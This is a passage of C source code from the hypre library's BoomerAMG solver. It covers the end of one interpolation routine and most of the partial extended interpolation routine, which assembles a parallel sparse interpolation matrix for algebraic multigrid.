if (big_k1 >= col_1 && big_k1 < col_n)
{
/*diag*/
loc_col = (HYPRE_Int)(big_k1 - col_1);
indx = ihat[loc_col];
if (indx > -1)
{
ahat[indx] -= A_ext_data[kk] * distribute;
}
else if (P_marker[loc_col] >= jj_begin_row)
{
ihat[loc_col] = cnt_c;
ipnt[cnt_c] = loc_col;
ahat[cnt_c++] -= A_ext_data[kk] * distribute;
}
else
{
ihat[loc_col] = cnt_f;
ipnt[cnt_f] = loc_col;
ahat[cnt_f++] -= A_ext_data[kk] * distribute;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (num_functions == 1 ||
dof_func_offd[loc_col] == dof_func_offd[i1])
{
indx = ihat_offd[loc_col];
if (indx > -1)
{
ahat_offd[indx] -= A_ext_data[kk] * distribute;
}
else if (P_marker_offd[loc_col] >= jj_begin_row_offd)
{
ihat_offd[loc_col] = cnt_c_offd;
ipnt_offd[cnt_c_offd] = loc_col;
ahat_offd[cnt_c_offd++] -= A_ext_data[kk] * distribute;
}
else
{
ihat_offd[loc_col] = cnt_f_offd;
ipnt_offd[cnt_f_offd] = loc_col;
ahat_offd[cnt_f_offd++] -= A_ext_data[kk] * distribute;
}
}
}
}
}
}
}
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
wall_2 += wall_time;
fflush(NULL);
}
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
diagonal = ahat[cnt_c];
ahat[cnt_c] = 0;
sum_pos = 0;
sum_pos_C = 0;
sum_neg = 0;
sum_neg_C = 0;
sum = 0;
sum_C = 0;
if (sep_weight == 1)
{
for (jj = 0; jj < cnt_c; jj++)
{
if (ahat[jj] > 0)
{
sum_pos_C += ahat[jj];
}
else
{
sum_neg_C += ahat[jj];
}
}
if (num_procs > 1)
{
for (jj = 0; jj < cnt_c_offd; jj++)
{
if (ahat_offd[jj] > 0)
{
sum_pos_C += ahat_offd[jj];
}
else
{
sum_neg_C += ahat_offd[jj];
}
}
}
sum_pos = sum_pos_C;
sum_neg = sum_neg_C;
for (jj = cnt_c + 1; jj < cnt_f; jj++)
{
if (ahat[jj] > 0)
{
sum_pos += ahat[jj];
}
else
{
sum_neg += ahat[jj];
}
ahat[jj] = 0;
}
if (num_procs > 1)
{
for (jj = cnt_c_offd; jj < cnt_f_offd; jj++)
{
if (ahat_offd[jj] > 0)
{
sum_pos += ahat_offd[jj];
}
else
{
sum_neg += ahat_offd[jj];
}
ahat_offd[jj] = 0;
}
}
if (sum_neg_C * diagonal != 0.0) { alfa = sum_neg / sum_neg_C / diagonal; }
if (sum_pos_C * diagonal != 0.0) { beta = sum_pos / sum_pos_C / diagonal; }
/*-----------------------------------------------------------------
* Set interpolation weight by dividing by the diagonal.
*-----------------------------------------------------------------*/
for (jj = jj_begin_row; jj < jj_end_row; jj++)
{
j1 = ihat[P_diag_j[jj]];
if (ahat[j1] > 0)
{
P_diag_data[jj] = -beta * ahat[j1];
}
else
{
P_diag_data[jj] = -alfa * ahat[j1];
}
P_diag_j[jj] = fine_to_coarse[P_diag_j[jj]];
ahat[j1] = 0;
}
for (jj = 0; jj < cnt_f; jj++)
{
ihat[ipnt[jj]] = -1;
}
if (num_procs > 1)
{
for (jj = jj_begin_row_offd; jj < jj_end_row_offd; jj++)
{
j1 = ihat_offd[P_offd_j[jj]];
if (ahat_offd[j1] > 0)
{
P_offd_data[jj] = -beta * ahat_offd[j1];
}
else
{
P_offd_data[jj] = -alfa * ahat_offd[j1];
}
ahat_offd[j1] = 0;
}
for (jj = 0; jj < cnt_f_offd; jj++)
{
ihat_offd[ipnt_offd[jj]] = -1;
}
}
}
else
{
for (jj = 0; jj < cnt_c; jj++)
{
sum_C += ahat[jj];
}
if (num_procs > 1)
{
for (jj = 0; jj < cnt_c_offd; jj++)
{
sum_C += ahat_offd[jj];
}
}
sum = sum_C;
for (jj = cnt_c + 1; jj < cnt_f; jj++)
{
sum += ahat[jj];
ahat[jj] = 0;
}
if (num_procs > 1)
{
for (jj = cnt_c_offd; jj < cnt_f_offd; jj++)
{
sum += ahat_offd[jj];
ahat_offd[jj] = 0;
}
}
if (sum_C * diagonal != 0.0) { alfa = sum / sum_C / diagonal; }
/*-----------------------------------------------------------------
* Set interpolation weight by dividing by the diagonal.
*-----------------------------------------------------------------*/
for (jj = jj_begin_row; jj < jj_end_row; jj++)
{
j1 = ihat[P_diag_j[jj]];
P_diag_data[jj] = -alfa * ahat[j1];
P_diag_j[jj] = fine_to_coarse[P_diag_j[jj]];
ahat[j1] = 0;
}
for (jj = 0; jj < cnt_f; jj++)
{
ihat[ipnt[jj]] = -1;
}
if (num_procs > 1)
{
for (jj = jj_begin_row_offd; jj < jj_end_row_offd; jj++)
{
j1 = ihat_offd[P_offd_j[jj]];
P_offd_data[jj] = -alfa * ahat_offd[j1];
ahat_offd[j1] = 0;
}
for (jj = 0; jj < cnt_f_offd; jj++)
{
ihat_offd[ipnt_offd[jj]] = -1;
}
}
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
wall_3 += wall_time;
fflush(NULL);
}
}
}
if (debug_flag == 4)
{
hypre_printf("Proc = %d fill part 1 %f part 2 %f part 3 %f\n",
my_id, wall_1, wall_2, wall_3);
fflush(NULL);
}
P = hypre_ParCSRMatrixCreate(comm,
total_old_global_cpts,
total_global_cpts,
num_old_cpts_global,
num_cpts_global,
0,
P_diag_i[n_coarse_old],
P_offd_i[n_coarse_old]);
P_diag = hypre_ParCSRMatrixDiag(P);
hypre_CSRMatrixData(P_diag) = P_diag_data;
hypre_CSRMatrixI(P_diag) = P_diag_i;
hypre_CSRMatrixJ(P_diag) = P_diag_j;
P_offd = hypre_ParCSRMatrixOffd(P);
hypre_CSRMatrixData(P_offd) = P_offd_data;
hypre_CSRMatrixI(P_offd) = P_offd_i;
hypre_CSRMatrixJ(P_offd) = P_offd_j;
hypre_CSRMatrixMemoryLocation(P_diag) = HYPRE_MEMORY_HOST;
hypre_CSRMatrixMemoryLocation(P_offd) = HYPRE_MEMORY_HOST;
/* Compress P, removing coefficients smaller than trunc_factor * Max */
if (trunc_factor != 0.0 || max_elmts > 0)
{
hypre_BoomerAMGInterpTruncation(P, trunc_factor, max_elmts);
P_diag_data = hypre_CSRMatrixData(P_diag);
P_diag_i = hypre_CSRMatrixI(P_diag);
P_diag_j = hypre_CSRMatrixJ(P_diag);
P_offd_data = hypre_CSRMatrixData(P_offd);
P_offd_i = hypre_CSRMatrixI(P_offd);
P_offd_j = hypre_CSRMatrixJ(P_offd);
P_diag_size = P_diag_i[n_coarse_old];
P_offd_size = P_offd_i[n_coarse_old];
}
/* This builds col_map, col_map should be monotone increasing and contain
* global numbers. */
if (P_offd_size)
{
hypre_build_interp_colmap(P, full_off_procNodes, tmp_CF_marker_offd, fine_to_coarse_offd);
}
hypre_MatvecCommPkgCreate(P);
for (i = 0; i < n_fine; i++)
if (CF_marker[i] < -1) { CF_marker[i] = -1; }
*P_ptr = P;
/* Deallocate memory */
hypre_TFree(fine_to_coarse, HYPRE_MEMORY_HOST);
hypre_TFree(old_coarse_to_fine, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker, HYPRE_MEMORY_HOST);
hypre_TFree(ahat, HYPRE_MEMORY_HOST);
hypre_TFree(ihat, HYPRE_MEMORY_HOST);
hypre_TFree(ipnt, HYPRE_MEMORY_HOST);
if (full_off_procNodes)
{
hypre_TFree(ahat_offd, HYPRE_MEMORY_HOST);
hypre_TFree(ihat_offd, HYPRE_MEMORY_HOST);
hypre_TFree(ipnt_offd, HYPRE_MEMORY_HOST);
}
if (num_procs > 1)
{
hypre_CSRMatrixDestroy(Sop);
hypre_CSRMatrixDestroy(A_ext);
hypre_TFree(fine_to_coarse_offd, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(CF_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(tmp_CF_marker_offd, HYPRE_MEMORY_HOST);
if (num_functions > 1)
{
hypre_TFree(dof_func_offd, HYPRE_MEMORY_HOST);
}
hypre_MatvecCommPkgDestroy(extend_comm_pkg);
}
return hypre_error_flag;
}
/*---------------------------------------------------------------------------
* hypre_BoomerAMGBuildPartialExtInterp
* Comment:
*--------------------------------------------------------------------------*/
HYPRE_Int
hypre_BoomerAMGBuildPartialExtInterp(hypre_ParCSRMatrix *A, HYPRE_Int *CF_marker,
hypre_ParCSRMatrix *S, HYPRE_BigInt *num_cpts_global,
HYPRE_BigInt *num_old_cpts_global,
HYPRE_Int num_functions, HYPRE_Int *dof_func, HYPRE_Int debug_flag,
HYPRE_Real trunc_factor, HYPRE_Int max_elmts,
hypre_ParCSRMatrix **P_ptr)
{
/* Communication Variables */
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
HYPRE_Int my_id, num_procs;
/* Variables to store input variables */
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
HYPRE_Int *A_diag_i = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_j = hypre_CSRMatrixJ(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int *A_offd_i = hypre_CSRMatrixI(A_offd);
HYPRE_Int *A_offd_j = hypre_CSRMatrixJ(A_offd);
/*HYPRE_Int num_cols_A_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_Int *col_map_offd = hypre_ParCSRMatrixColMapOffd(A);*/
HYPRE_Int n_fine = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_1 = hypre_ParCSRMatrixFirstRowIndex(A);
HYPRE_Int local_numrows = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_n = col_1 + (HYPRE_BigInt)local_numrows;
HYPRE_BigInt total_global_cpts, my_first_cpt;
/* Variables to store strong connection matrix info */
hypre_CSRMatrix *S_diag = hypre_ParCSRMatrixDiag(S);
HYPRE_Int *S_diag_i = hypre_CSRMatrixI(S_diag);
HYPRE_Int *S_diag_j = hypre_CSRMatrixJ(S_diag);
hypre_CSRMatrix *S_offd = hypre_ParCSRMatrixOffd(S);
HYPRE_Int *S_offd_i = hypre_CSRMatrixI(S_offd);
HYPRE_Int *S_offd_j = hypre_CSRMatrixJ(S_offd);
/* Interpolation matrix P */
hypre_ParCSRMatrix *P;
hypre_CSRMatrix *P_diag;
hypre_CSRMatrix *P_offd;
HYPRE_Real *P_diag_data = NULL;
HYPRE_Int *P_diag_i, *P_diag_j = NULL;
HYPRE_Real *P_offd_data = NULL;
HYPRE_Int *P_offd_i, *P_offd_j = NULL;
/*HYPRE_Int *col_map_offd_P = NULL;*/
HYPRE_Int P_diag_size;
HYPRE_Int P_offd_size;
HYPRE_Int *P_marker = NULL;
HYPRE_Int *P_marker_offd = NULL;
HYPRE_Int *CF_marker_offd = NULL;
HYPRE_Int *tmp_CF_marker_offd = NULL;
HYPRE_Int *dof_func_offd = NULL;
/* Full row information for columns of A that are off diag*/
hypre_CSRMatrix *A_ext;
HYPRE_Real *A_ext_data;
HYPRE_Int *A_ext_i;
HYPRE_BigInt *A_ext_j;
HYPRE_Int *fine_to_coarse = NULL;
HYPRE_BigInt *fine_to_coarse_offd = NULL;
HYPRE_Int *old_coarse_to_fine = NULL;
HYPRE_Int loc_col;
HYPRE_Int full_off_procNodes;
hypre_CSRMatrix *Sop;
HYPRE_Int *Sop_i;
HYPRE_BigInt *Sop_j;
HYPRE_Int sgn;
/* Variables to keep count of interpolatory points */
HYPRE_Int jj_counter, jj_counter_offd;
HYPRE_Int jj_begin_row, jj_end_row;
HYPRE_Int jj_begin_row_offd = 0;
HYPRE_Int jj_end_row_offd = 0;
HYPRE_Int coarse_counter;
HYPRE_Int n_coarse_old;
HYPRE_BigInt total_old_global_cpts;
/* Interpolation weight variables */
HYPRE_Real sum, diagonal, distribute;
HYPRE_Int strong_f_marker = -2;
/* Loop variables */
/*HYPRE_Int index;*/
HYPRE_Int cnt, old_cnt;
HYPRE_Int start_indexing = 0;
HYPRE_Int i, ii, i1, i2, jj, kk, k1, jj1;
HYPRE_BigInt big_k1;
/* Definitions */
HYPRE_Real zero = 0.0;
HYPRE_Real one = 1.0;
HYPRE_Real wall_time;
hypre_ParCSRCommPkg *extend_comm_pkg = NULL;
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
/* BEGIN */
hypre_MPI_Comm_size(comm, &num_procs);
hypre_MPI_Comm_rank(comm, &my_id);
my_first_cpt = num_cpts_global[0];
/*my_first_old_cpt = num_old_cpts_global[0];*/
n_coarse_old = (HYPRE_Int)(num_old_cpts_global[1] - num_old_cpts_global[0]);
/*n_coarse = num_cpts_global[1] - num_cpts_global[0];*/
if (my_id == (num_procs - 1))
{
total_global_cpts = num_cpts_global[1];
total_old_global_cpts = num_old_cpts_global[1];
}
hypre_MPI_Bcast(&total_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
hypre_MPI_Bcast(&total_old_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
if (!comm_pkg)
{
hypre_MatvecCommPkgCreate(A);
comm_pkg = hypre_ParCSRMatrixCommPkg(A);
}
/* Set up off processor information (specifically for neighbors of
* neighbors */
full_off_procNodes = 0;
if (num_procs > 1)
{
if (hypre_exchange_interp_data(
&CF_marker_offd, &dof_func_offd, &A_ext, &full_off_procNodes, &Sop, &extend_comm_pkg,
A, CF_marker, S, num_functions, dof_func, 1))
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_EXTENDED_I_INTERP] += hypre_MPI_Wtime();
#endif
return hypre_error_flag;
}
A_ext_i = hypre_CSRMatrixI(A_ext);
A_ext_j = hypre_CSRMatrixBigJ(A_ext);
A_ext_data = hypre_CSRMatrixData(A_ext);
Sop_i = hypre_CSRMatrixI(Sop);
Sop_j = hypre_CSRMatrixBigJ(Sop);
}
/*-----------------------------------------------------------------------
* First Pass: Determine size of P and fill in fine_to_coarse mapping.
*-----------------------------------------------------------------------*/
/*-----------------------------------------------------------------------
* Intialize counters and allocate mapping vector.
*-----------------------------------------------------------------------*/
P_diag_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
P_offd_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
if (n_fine)
{
old_coarse_to_fine = hypre_CTAlloc(HYPRE_Int, n_coarse_old, HYPRE_MEMORY_HOST);
fine_to_coarse = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
P_marker = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
}
if (full_off_procNodes)
{
P_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
fine_to_coarse_offd = hypre_CTAlloc(HYPRE_BigInt, full_off_procNodes, HYPRE_MEMORY_HOST);
tmp_CF_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
}
hypre_initialize_vecs(n_fine, full_off_procNodes, fine_to_coarse,
fine_to_coarse_offd, P_marker, P_marker_offd,
tmp_CF_marker_offd);
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
coarse_counter = 0;
cnt = 0;
old_cnt = 0;
for (i = 0; i < n_fine; i++)
{
fine_to_coarse[i] = -1;
if (CF_marker[i] == 1)
{
fine_to_coarse[i] = cnt++;
old_coarse_to_fine[old_cnt++] = i;
}
else if (CF_marker[i] == -2)
{
old_coarse_to_fine[old_cnt++] = i;
}
}
/*-----------------------------------------------------------------------
* Loop over fine grid.
*-----------------------------------------------------------------------*/
for (ii = 0; ii < n_coarse_old; ii++)
{
P_diag_i[ii] = jj_counter;
if (num_procs > 1)
{
P_offd_i[ii] = jj_counter_offd;
}
i = old_coarse_to_fine[ii];
if (CF_marker[i] > 0)
{
jj_counter++;
coarse_counter++;
}
/*--------------------------------------------------------------------
* If i is an F-point, interpolation is from the C-points that
* strongly influence i, or C-points that stronly influence F-points
* that strongly influence i.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
if (CF_marker[i1] > 0)
{
/* i1 is a C point */
if (P_marker[i1] < P_diag_i[ii])
{
P_marker[i1] = jj_counter;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
/* i1 is a F point, loop through it's strong neighbors */
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] > 0)
{
if (P_marker[k1] < P_diag_i[ii])
{
P_marker[k1] = jj_counter;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] > 0)
{
if (P_marker_offd[k1] < P_offd_i[ii])
{
tmp_CF_marker_offd[k1] = 1;
P_marker_offd[k1] = jj_counter_offd;
jj_counter_offd++;
}
}
}
}
}
}
/* Look at off diag strong connections of i */
if (num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if (CF_marker_offd[i1] > 0)
{
if (P_marker_offd[i1] < P_offd_i[ii])
{
tmp_CF_marker_offd[i1] = 1;
P_marker_offd[i1] = jj_counter_offd;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
/* F point; look at neighbors of i1. Sop contains global col
* numbers and entries that could be in S_diag or S_offd or
* neither. */
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* In S_diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] < P_diag_i[ii])
{
P_marker[loc_col] = jj_counter;
jj_counter++;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] < P_offd_i[ii])
{
P_marker_offd[loc_col] = jj_counter_offd;
tmp_CF_marker_offd[loc_col] = 1;
jj_counter_offd++;
}
}
}
}
}
}
}
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d determine structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
* Allocate arrays.
*-----------------------------------------------------------------------*/
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
P_diag_size = jj_counter;
P_offd_size = jj_counter_offd;
if (P_diag_size)
{
P_diag_j = hypre_CTAlloc(HYPRE_Int, P_diag_size, HYPRE_MEMORY_HOST);
P_diag_data = hypre_CTAlloc(HYPRE_Real, P_diag_size, HYPRE_MEMORY_HOST);
}
if (P_offd_size)
{
P_offd_j = hypre_CTAlloc(HYPRE_Int, P_offd_size, HYPRE_MEMORY_HOST);
P_offd_data = hypre_CTAlloc(HYPRE_Real, P_offd_size, HYPRE_MEMORY_HOST);
}
P_diag_i[n_coarse_old] = jj_counter;
P_offd_i[n_coarse_old] = jj_counter_offd;
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
/* Fine to coarse mapping */
if (num_procs > 1)
{
hypre_big_insert_new_nodes(comm_pkg, extend_comm_pkg, fine_to_coarse,
full_off_procNodes, my_first_cpt,
fine_to_coarse_offd);
}
for (i = 0; i < n_fine; i++)
{
P_marker[i] = -1;
}
for (i = 0; i < full_off_procNodes; i++)
{
P_marker_offd[i] = -1;
}
/*-----------------------------------------------------------------------
* Loop over fine grid points.
*-----------------------------------------------------------------------*/
for (ii = 0; ii < n_coarse_old; ii++)
{
jj_begin_row = jj_counter;
jj_begin_row_offd = jj_counter_offd;
i = old_coarse_to_fine[ii];
/*--------------------------------------------------------------------
* If i is a c-point, interpolation is the identity.
*--------------------------------------------------------------------*/
if (CF_marker[i] > 0)
{
P_diag_j[jj_counter] = fine_to_coarse[i];
P_diag_data[jj_counter] = one;
jj_counter++;
}
/*--------------------------------------------------------------------
* If i is an F-point, build interpolation.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
strong_f_marker--;
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
/*--------------------------------------------------------------
* If neighbor i1 is a C-point, set column number in P_diag_j
* and initialize interpolation weight to zero.
*--------------------------------------------------------------*/
if (CF_marker[i1] >= 0)
{
if (P_marker[i1] < jj_begin_row)
{
P_marker[i1] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[i1];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
P_marker[i1] = strong_f_marker;
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] >= 0)
{
if (P_marker[k1] < jj_begin_row)
{
P_marker[k1] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[k1];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] >= 0)
{
if (P_marker_offd[k1] < jj_begin_row_offd)
{
P_marker_offd[k1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = k1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
if ( num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if ( CF_marker_offd[i1] >= 0)
{
if (P_marker_offd[i1] < jj_begin_row_offd)
{
P_marker_offd[i1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = i1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
P_marker_offd[i1] = strong_f_marker;
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
/* Find local col number */
if (big_k1 >= col_1 && big_k1 < col_n)
{
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] < jj_begin_row)
{
P_marker[loc_col] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[loc_col];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] < jj_begin_row_offd)
{
P_marker_offd[loc_col] = jj_counter_offd;
P_offd_j[jj_counter_offd] = loc_col;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
jj_end_row = jj_counter;
jj_end_row_offd = jj_counter_offd;
diagonal = A_diag_data[A_diag_i[i]];
for (jj = A_diag_i[i] + 1; jj < A_diag_i[i + 1]; jj++)
{
/* i1 is a c-point and strongly influences i, accumulate
* a_(i,i1) into interpolation weight */
i1 = A_diag_j[jj];
if (P_marker[i1] >= jj_begin_row)
{
P_diag_data[P_marker[i1]] += A_diag_data[jj];
}
else if (P_marker[i1] == strong_f_marker)
{
sum = zero;
sgn = 1;
if (A_diag_data[A_diag_i[i1]] < 0) { sgn = -1; }
/* Loop over row of A for point i1 and calculate the sum
* of the connections to c-points that strongly incluence i. */
for (jj1 = A_diag_i[i1] + 1; jj1 < A_diag_i[i1 + 1]; jj1++)
{
i2 = A_diag_j[jj1];
if ((P_marker[i2] >= jj_begin_row) && (sgn * A_diag_data[jj1]) < 0)
{
sum += A_diag_data[jj1];
}
}
if (num_procs > 1)
{
for (jj1 = A_offd_i[i1]; jj1 < A_offd_i[i1 + 1]; jj1++)
{
i2 = A_offd_j[jj1];
if (P_marker_offd[i2] >= jj_begin_row_offd &&
(sgn * A_offd_data[jj1]) < 0)
{
sum += A_offd_data[jj1];
}
}
}
if (sum != 0)
{
distribute = A_diag_data[jj] / sum;
/* Loop over row of A for point i1 and do the distribution */
for (jj1 = A_diag_i[i1] + 1; jj1 < A_diag_i[i1 + 1]; jj1++)
{
i2 = A_diag_j[jj1];
if (P_marker[i2] >= jj_begin_row && (sgn * A_diag_data[jj1]) < 0)
P_diag_data[P_marker[i2]] +=
distribute * A_diag_data[jj1];
}
if (num_procs > 1)
{
for (jj1 = A_offd_i[i1]; jj1 < A_offd_i[i1 + 1]; jj1++)
{
i2 = A_offd_j[jj1];
if (P_marker_offd[i2] >= jj_begin_row_offd &&
(sgn * A_offd_data[jj1]) < 0)
P_offd_data[P_marker_offd[i2]] +=
distribute * A_offd_data[jj1];
}
}
}
else
{
diagonal += A_diag_data[jj];
}
}
/* neighbor i1 weakly influences i, accumulate a_(i,i1) into
* diagonal */
else if (CF_marker[i1] != -3)
{
if (num_functions == 1 || dof_func[i] == dof_func[i1])
{
diagonal += A_diag_data[jj];
}
}
}
if (num_procs > 1)
{
for (jj = A_offd_i[i]; jj < A_offd_i[i + 1]; jj++)
{
i1 = A_offd_j[jj];
if (P_marker_offd[i1] >= jj_begin_row_offd)
{
P_offd_data[P_marker_offd[i1]] += A_offd_data[jj];
}
else if (P_marker_offd[i1] == strong_f_marker)
{
sum = zero;
sgn = 1;
for (jj1 = A_ext_i[i1]; jj1 < A_ext_i[i1 + 1]; jj1++)
{
big_k1 = A_ext_j[jj1];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] >= jj_begin_row )
{
sum += A_ext_data[jj1];
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] >= jj_begin_row_offd &&
(sgn * A_ext_data[jj1]) < 0)
{
sum += A_ext_data[jj1];
}
}
}
if (sum != 0)
{
distribute = A_offd_data[jj] / sum;
for (jj1 = A_ext_i[i1]; jj1 < A_ext_i[i1 + 1]; jj1++)
{
big_k1 = A_ext_j[jj1];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] >= jj_begin_row)
P_diag_data[P_marker[loc_col]] += distribute *
A_ext_data[jj1];
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] >= jj_begin_row_offd)
P_offd_data[P_marker_offd[loc_col]] += distribute *
A_ext_data[jj1];
}
}
}
else
{
diagonal += A_offd_data[jj];
}
}
else if (CF_marker_offd[i1] != -3)
{
if (num_functions == 1 || dof_func[i] == dof_func_offd[i1])
{
diagonal += A_offd_data[jj];
}
}
}
}
if (diagonal)
{
for (jj = jj_begin_row; jj < jj_end_row; jj++)
{
P_diag_data[jj] /= -diagonal;
}
for (jj = jj_begin_row_offd; jj < jj_end_row_offd; jj++)
{
P_offd_data[jj] /= -diagonal;
}
}
}
strong_f_marker--;
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d fill structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
* Allocate arrays.
*-----------------------------------------------------------------------*/
P = hypre_ParCSRMatrixCreate(comm,
total_old_global_cpts,
total_global_cpts,
num_old_cpts_global,
num_cpts_global,
0,
P_diag_i[n_coarse_old],
P_offd_i[n_coarse_old]);
P_diag = hypre_ParCSRMatrixDiag(P);
hypre_CSRMatrixData(P_diag) = P_diag_data;
hypre_CSRMatrixI(P_diag) = P_diag_i;
hypre_CSRMatrixJ(P_diag) = P_diag_j;
P_offd = hypre_ParCSRMatrixOffd(P);
hypre_CSRMatrixData(P_offd) = P_offd_data;
hypre_CSRMatrixI(P_offd) = P_offd_i;
hypre_CSRMatrixJ(P_offd) = P_offd_j;
hypre_CSRMatrixMemoryLocation(P_diag) = HYPRE_MEMORY_HOST;
hypre_CSRMatrixMemoryLocation(P_offd) = HYPRE_MEMORY_HOST;
/* Compress P, removing coefficients smaller than trunc_factor * Max */
if (trunc_factor != 0.0 || max_elmts > 0)
{
hypre_BoomerAMGInterpTruncation(P, trunc_factor, max_elmts);
P_diag_data = hypre_CSRMatrixData(P_diag);
P_diag_i = hypre_CSRMatrixI(P_diag);
P_diag_j = hypre_CSRMatrixJ(P_diag);
P_offd_data = hypre_CSRMatrixData(P_offd);
P_offd_i = hypre_CSRMatrixI(P_offd);
P_offd_j = hypre_CSRMatrixJ(P_offd);
P_diag_size = P_diag_i[n_coarse_old];
P_offd_size = P_offd_i[n_coarse_old];
}
/* This builds col_map, col_map should be monotone increasing and contain
* global numbers. */
if (P_offd_size)
{
hypre_build_interp_colmap(P, full_off_procNodes, tmp_CF_marker_offd, fine_to_coarse_offd);
}
hypre_MatvecCommPkgCreate(P);
for (i = 0; i < n_fine; i++)
if (CF_marker[i] < -1) { CF_marker[i] = -1; }
*P_ptr = P;
/* Deallocate memory */
hypre_TFree(fine_to_coarse, HYPRE_MEMORY_HOST);
hypre_TFree(old_coarse_to_fine, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker, HYPRE_MEMORY_HOST);
if (num_procs > 1)
{
hypre_CSRMatrixDestroy(Sop);
hypre_CSRMatrixDestroy(A_ext);
hypre_TFree(fine_to_coarse_offd, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(CF_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(tmp_CF_marker_offd, HYPRE_MEMORY_HOST);
if (num_functions > 1)
{
